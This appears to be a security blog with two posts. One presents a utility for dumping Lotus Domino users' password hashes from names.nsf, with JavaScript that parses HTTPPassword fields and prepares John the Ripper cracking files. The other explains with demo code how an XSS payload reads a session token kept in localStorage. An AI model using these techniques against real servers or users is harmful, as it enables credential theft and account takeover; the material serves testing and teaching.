Web Application

Lotus Domino 8.5 – Users’ Password Hashes Retriever

Updated my GitHub to include a new script, and added a link to my GitHub page on the sidebar of this blog. The script in question is fetchDomino, a utility that dumps all Lotus Domino users' password hashes. I wrote it to replace Domino Raptor, which did not work for me while testing Lotus Domino 8.5.

In a few words, this script can be used once we have access to the Domino server's names.nsf database. Some servers leave this file completely exposed to the Internet; others require authentication, so a brute-force attack or another attack vector may be needed to get in. Once you have access to names.nsf, fetchDomino comes in very handy, as it collects all the users' hashes from the database for you. Then use the JtR jumbo patch with the "lotus5" format to crack these hashes (lotus5 covers the unsalted Domino 5 style hash; the salted hashes that Domino 6 and later generate are handled by JtR's "dominosec" format instead).
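To make the collect-then-crack step concrete, here is an added example (it is not the fetchDomino script from this post, nor Domino Raptor) that turns the HTML of Person documents fetched from names.nsf into John the Ripper input files, one per hash format. Everything it relies on is an assumption stated here: that the user list was already taken from the $Users view, that each Person document was opened with ?OpenDocument and renders the hash in a hidden input named HTTPPassword, and that the three sample pages below are constructed by hand rather than captured from a real server. Run it with Node.

```javascript
// Added example, not code from the post or from fetchDomino.
// Input: Person documents from names.nsf (assumed URL pattern
// /names.nsf/$Users/<name>?OpenDocument) with the hash in a hidden
// input named HTTPPassword. Output: "user:hash" lines grouped by the
// JtR format that cracks them.

// Constructed sample pages (not real server output): a Domino 5 style
// hash, a Domino 6+ salted hash, and a document with no Internet password.
const SAMPLE_PAGES = [
  { user: 'alice', html: '<form><input name="HTTPPassword" type="hidden" value="(355E98E7C7B59BD810ED845AD0FD2FC4)"></form>' },
  { user: 'bob',   html: '<form><input type="hidden" value="(GDpOtD35gGlyDgLn6Cl6)" name="HTTPPassword"></form>' },
  { user: 'carol', html: '<form><input name="FirstName" type="hidden" value="Carol"></form>' },
];

// Pull the value of the HTTPPassword input, whatever the attribute order.
function extractHttpPassword(html) {
  const tag = html.match(/<input\b[^>]*\bname="HTTPPassword"[^>]*>/i);
  if (!tag) return null;
  const value = tag[0].match(/\bvalue="([^"]*)"/i);
  return value ? value[1] : null;
}

// Map a raw HTTPPassword value to the JtR format that cracks it:
//   32 hex chars, usually shown in parentheses (Domino 5) -> lotus5, parentheses dropped
//   22 chars starting "(G" (Domino 6/7/8, salted)         -> dominosec, kept verbatim
//   "(H...)" (Domino 8.5 "more secure" setting)           -> dominosec8 (assumed name;
//                                                            confirm with `john --list=formats`)
function classifyHash(raw) {
  const bare = raw.replace(/^\((.*)\)$/, '$1');
  if (/^[0-9A-F]{32}$/i.test(bare)) return { format: 'lotus5', hash: bare.toUpperCase() };
  if (/^\(G[A-Za-z0-9+\/]{19}\)$/.test(raw)) return { format: 'dominosec', hash: raw };
  if (/^\(H[A-Za-z0-9+\/]{20,}\)$/.test(raw)) return { format: 'dominosec8', hash: raw };
  return { format: 'unknown', hash: raw };
}

// Walk the fetched pages; users without an Internet password are skipped.
function collectHashes(pages) {
  const out = [];
  for (const { user, html } of pages) {
    const raw = extractHttpPassword(html);
    if (!raw) continue;
    const { format, hash } = classifyHash(raw);
    out.push({ user, raw, format, hash });
  }
  return out;
}

// One john input file per format; each line is "user:hash".
function toJohnFiles(entries) {
  const files = {};
  for (const e of entries) {
    if (e.format === 'unknown') continue;
    if (!files[e.format]) files[e.format] = [];
    files[e.format].push(`${e.user}:${e.hash}`);
  }
  return files;
}

// Usage: print the file contents; save each under its format name.
const files = toJohnFiles(collectHashes(SAMPLE_PAGES));
for (const [format, lines] of Object.entries(files)) {
  console.log(`--- ${format}.txt (run: john --format=${format} ${format}.txt)`);
  console.log(lines.join('\n'));
}
```

Sorting by format before cracking matters because john expects a single format per run; feeding a mixed file to `--format=lotus5` silently drops the salted entries.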

If you are looking for a guide on how to hack Lotus Domino, refer to the document below:

http://dsecrg.com/files/pub/pdf/Penetration_from_application_down_to_OS_(Lotus_Domino).pdf


localStorage – Are Cookies Too Good For You?

I've seen several web applications carry the user's session ID (or token) in a custom HTTP header rather than storing it in a cookie. Some public web platforms save the same kind of token to track their user analytics; for instance, I recently noticed that the New Relic REST API platform stores the user ID in an HTTP header called X-NewRelic-ID.

While testing one application, I found both a cross-site scripting flaw and a session ID sent in a custom HTTP header. My goal was to steal the user's session ID, which the client sent to the application in a custom header named X-Auth-Token.
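The point behind the title: a token that page JavaScript has to attach to every request must itself be readable by page JavaScript, typically from localStorage, so any script injected through the XSS reads it just as easily. An HttpOnly cookie is sent by the browser without ever being exposed to script, which is exactly what the custom-header scheme gives up. The following is an added example, not code from this post or from the application I tested; the storage key authToken and the token values are made up, and the cookie jar is a small model of what document.cookie would show, included so the block also runs under Node where no browser cookie store exists.

```javascript
// Added example (not from the post): why a session token kept in
// localStorage and sent as X-Auth-Token is reachable by XSS, while an
// HttpOnly cookie is not. Runs in a browser or under Node; under Node an
// in-memory stand-in replaces window.localStorage.

const TOKEN_KEY = 'authToken'; // assumed key; the post does not name one

function makeStorage() {
  if (typeof localStorage !== 'undefined') return localStorage;
  const m = new Map();
  return {
    getItem: (k) => (m.has(k) ? m.get(k) : null),
    setItem: (k, v) => { m.set(k, String(v)); },
    removeItem: (k) => { m.delete(k); },
  };
}

// Application side: after login the client keeps the token and puts it on
// every API call as the X-Auth-Token header named in the post.
function saveSession(storage, token) {
  storage.setItem(TOKEN_KEY, token);
}

function authHeaders(storage) {
  const token = storage.getItem(TOKEN_KEY);
  return token ? { 'X-Auth-Token': token } : {};
}

// Attacker side: a payload running in the page origin (via the XSS) reads
// the same storage the legitimate code reads. Exfiltration, e.g. a request
// to an attacker-controlled host, would follow and is left out here.
function xssReadToken(storage) {
  return storage.getItem(TOKEN_KEY);
}

// Cookie model: what document.cookie exposes to script. A cookie with the
// HttpOnly flag is still sent on requests but never appears here, so the
// same XSS cannot read a session ID kept that way.
function scriptVisibleCookies(jar) {
  return jar
    .filter((c) => !c.httpOnly)
    .map((c) => `${c.name}=${c.value}`)
    .join('; ');
}

// Run both schemes side by side on constructed values.
function demo() {
  const storage = makeStorage();
  saveSession(storage, 'constructed-token-123');
  const jar = [
    { name: 'SESSION', value: 'constructed-cookie-456', httpOnly: true, secure: true },
    { name: 'theme',   value: 'dark',                   httpOnly: false, secure: false },
  ];
  return {
    headerSent: authHeaders(storage)['X-Auth-Token'],
    stolenToken: xssReadToken(storage),
    visibleCookies: scriptVisibleCookies(jar),
  };
}

console.log(demo());
```

In the output the header value and the stolen value are identical, while the cookie list shows only the non-sensitive theme cookie. Moving a token into a custom header does nothing against XSS; it only changes where the payload looks.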
